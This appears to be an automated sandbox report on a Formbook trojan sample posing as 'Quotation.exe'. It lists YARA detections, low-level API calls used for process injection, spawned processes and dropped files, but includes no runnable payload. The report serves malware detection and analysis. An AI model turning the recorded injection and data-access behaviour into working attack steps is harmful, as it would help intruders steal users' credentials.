        Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Program Files\Mozilla Firefox\firefox.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2836 -s 284
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_00406666
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_6D261A98
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_04F87412
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354E310
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FF330
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33531380
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F124C
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352D2EC
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3358717A
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335DD130
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3360010E
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335451C0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355B1E0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335EE076
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354B0D0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F70F1
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3357508C
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335300A0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F6757
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33542760
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354A760
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335ED646
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33564670
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355C600
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335DD62C
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FA6C0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FF6F6
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353C6E0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B36EC
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33540680
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3360A526
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FF5C9
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F75C6
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33540445
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33540B10
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3357DB19
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FFB2E
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B4BC0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FEA5B
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FCA13
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FFA89
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335859C0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353E9A0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FE9A6
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33549870
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355B870
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FF872
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33526868
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356E810
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33543800
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335E0835
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F18DA
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335428C0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33556882
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FFF63
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354CF00
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F1FC6
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33546FE0
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335FEFBF
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33560E50
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: String function: 3352B910 appears 190 times
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: String function: 33587BE4 appears 74 times
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: String function: 335AE692 appears 69 times
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: String function: 335BEF10 appears 71 times
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335734E0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572B10 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572BC0 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572B90 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335729F0 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572F00 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572E50 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572ED0 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572EB0 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572D10 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572DA0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572C50 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572C30 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572CF0 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33574260 NtSetContextThread,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33574570 NtSuspendThread,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572B00 NtQueryValueKey,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572B20 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572BE0 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572B80 NtCreateKey,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572A10 NtWriteFile,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572AC0 NtEnumerateValueKey,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572A80 NtClose,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572AA0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335729D0 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335738D0 NtGetContextThread,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572F30 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33572FB0 NtSetValueKey,
        Source: System.dll0.1.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: System.Security.Cryptography.X509Certificates.dll.1.dr | Static PE information: No import functions for PE file found
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemaintenanceservice.exe0 vs Quotation.exe
        Source: Quotation.exe, 00000001.00000002.21944394921.0000000000436000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs Quotation.exe
        Source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs Quotation.exe
        Source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.dll@ vs Quotation.exe
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSolutionExplorerCLI.dll vs Quotation.exe
        Source: Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepkcs11-helper-1.dll" vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000003.22626322501.00000000332CD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000000.21846769970.0000000000436000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000002.22757544824.0000000002F8C000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000003.22633102338.000000003347F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000002.22771863781.00000000337D0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
        Source: Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Quotation.exe
        Source: Quotation.exe | Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs Quotation.exe
        Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\control.exe | Section loaded: edgegdi.dll
        Source: Quotation.exe | Static PE information: invalid certificate
        Source: percentile.dll.1.dr | Static PE information: Number of sections : 19 > 10
        Source: libdatrie-1.dll.1.dr | Static PE information: Number of sections : 11 > 10
        Source: libpkcs11-helper-1.dll.1.dr | Static PE information: Number of sections : 12 > 10
        Source: Quotation.exe | Virustotal: Detection: 18%
        Source: Quotation.exe | ReversingLabs: Detection: 25%
        Source: C:\Users\user\Desktop\Quotation.exe | File read: C:\Users\user\Desktop\Quotation.exe
        Source: Quotation.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Quotation.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
        Source: C:\Users\user\Desktop\Quotation.exe | Process created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Program Files\Mozilla Firefox\firefox.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2836 -s 284
        Source: C:\Users\user\Desktop\Quotation.exe | Process created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\Quotation.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Temp\nsmFC66.tmp
        Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@11/11@18/15
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_00402138 CoCreateInstance,MultiByteToWideChar,
        Source: C:\Users\user\Desktop\Quotation.exe | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
        Source: 4995H5Jfc.13.dr | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: C:\Windows\SysWOW64\control.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Quotation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
        Source: Binary string: maintenanceservice.pdb@ 0%P% source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
        Source: Binary string: mshtml.pdb source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
        Source: Binary string: control.pdb source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr
        Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: control.pdbUGP source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: maintenanceservice.pdb source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
        Source: Binary string: firefox.pdb source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara match | File source: 00000001.00000002.21946690040.00000000050B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_6D262F60 push eax; ret
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_04F808C0 push ebp; retf
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_04F86274 push ebp; retf
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_04F84A2E push edx; retf
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_04F80604 push esi; ret
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_04F85F8F push edi; retf
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_04F8694F push edi; ret
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_04F86525 push edi; iretd
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335308CD push ecx; mov dword ptr [esp], ecx
        Source: maintenanceservice2.exe.1.dr | Static PE information: section name: .00cfg
        Source: percentile.dll.1.dr | Static PE information: section name: .xdata
        Source: percentile.dll.1.dr | Static PE information: section name: /4
        Source: percentile.dll.1.dr | Static PE information: section name: /19
        Source: percentile.dll.1.dr | Static PE information: section name: /31
        Source: percentile.dll.1.dr | Static PE information: section name: /45
        Source: percentile.dll.1.dr | Static PE information: section name: /57
        Source: percentile.dll.1.dr | Static PE information: section name: /70
        Source: percentile.dll.1.dr | Static PE information: section name: /81
        Source: percentile.dll.1.dr | Static PE information: section name: /92
        Source: libdatrie-1.dll.1.dr | Static PE information: section name: .xdata
        Source: libpkcs11-helper-1.dll.1.dr | Static PE information: section name: .xdata
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_6D261A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
        Source: System.Security.Cryptography.X509Certificates.dll.1.dr | Static PE information: 0xF15766E0 [Tue Apr 22 20:30:24 2098 UTC]
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\libdatrie-1.dll
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\libpkcs11-helper-1.dll
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\percentile.dll
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Temp\nsi3181.tmp\System.dll
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\SolutionExplorerCLI.dll
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\System.Security.Cryptography.X509Certificates.dll
        Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\maintenanceservice2.exe
        Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
